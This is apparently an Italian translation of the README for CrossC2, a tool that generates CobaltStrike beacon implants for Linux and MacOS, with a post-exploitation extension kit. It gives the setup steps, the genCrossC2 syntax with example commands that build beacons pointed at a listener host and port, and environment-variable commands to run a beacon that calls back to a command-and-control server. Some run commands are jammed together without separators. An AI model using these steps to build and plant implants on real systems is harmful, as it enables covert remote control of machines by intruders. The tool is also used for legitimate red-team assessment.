
Genera il payload cross-platform di CobaltStrike
README | 中文文档 | README_FULL | 中文完整文档
Supporto per la valutazione della sicurezza di CobaltStrike su altre piattaforme (Linux/MacOS/...), e include il supporto allo sviluppo del modulo post-penetrazione Unix

- Scarica
Scarica CrossC2.cna genCrossC2 CrossC2Kit, modifica la configurazione CrossC2.cna
- Crea listener e copia la chiave
windows/beacon_https/reverse_https.cobaltstrike.beacon_keys nella directory del teamserver in locale
- Estensione delle funzioni
CrossC2Kit_Loader.cna, includendo il caricamento in memoria e altre funzionics4.x mancano la gestione dei file e la funzione di elenco dei processi, devi usare questo Loader per riavviare
- Genera beacon
Usa la funzione GUI fornita da cli o cna per generare beacon di default
genCrossC2 <listener-ip/domain> <listener-port> <beacon_keys> <rebind_library;config.ini;c2profile.profile> <target_platform> <target_arch>
ex:
1. read BEACON_KEY from current path and generate BEACON of default C2Profile traffic protocol
genCrossC2 127.0.0.1 5555 null null Linux x64 beacon.out
2. specify the BEACON of the custom protocol dynamic library
genCrossC2 127.0.0.1 5555 .cobaltstrike.beacon_keys c2profile.so MacOS x64 beacon.out
3. specify the C2Profile that needs to be automatically parsed
genCrossC2 www.example.com 443 .cobaltstrike.beacon_keys ";;c2profile.profile" Linux x64 beacon.out
configurazioni più avanzate possono essere trovate nella documentazione: 📄Riferimento
- Esegui beacon
export CCPATH=/opt/ && /tmp/c2/tmp/c2 /tmp/c2-rebind.soexport CCHOST=127.0.0.1 && export CCPORT=443 && /tmp/c2export CCDEBUG=1 && /tmp/c2CrossC2Kit: https://github.com/CrossC2/CrossC2Kit
CrossC2Kit è un'espansione di infiltrazione per la piattaforma Unix derivata da CrossC2. Usa il motore Aggressor Script Open Source Script. Può essere utilizzato per creare automazione per simulare il processo operativo del Red Team ed espandere il client CobaltStrike.
CrossC2Kit eredita le funzionalità originali di CobaltStrike, quindi la grammatica di sviluppo e scrittura fa ancora riferimento alla documentazione ufficiale: https://trial.cobaltstrike.com/aggressor-script/index.html
Ma ha alcune estensioni API sopra CrossC2 per controllare il beacon della piattaforma Unix
API: 📄Riferimento
Demo: 
Solo per uso interno da parte di imprese e organizzazioni, questo framework ha un certo grado di instabilità. Ai non professionisti non è consentito utilizzarlo. Nessuno deve usarlo per scopi illegali e per profitto. Inoltre, è vietato pubblicare versioni modificate senza autorizzazione, altrimenti si incorre in responsabilità legali.
Grazie a @Emma per il Logo disegnato per CrossC2, progettato nello stile delle serie Armitage e CobaltStrike
| CS3.14 (correzioni di bug) | CS4.0 | CS4.X (4.1~4.8) |
|---|
| Branch master | ✅ | ||
| branch cs4.0 | ✅ | ||
| branch cs4.1 | ✅ | ||
| Pagina di rilascio <= v2.1 | ✅ | ||
| Pagina di rilascio >= v2.2 | ✅ |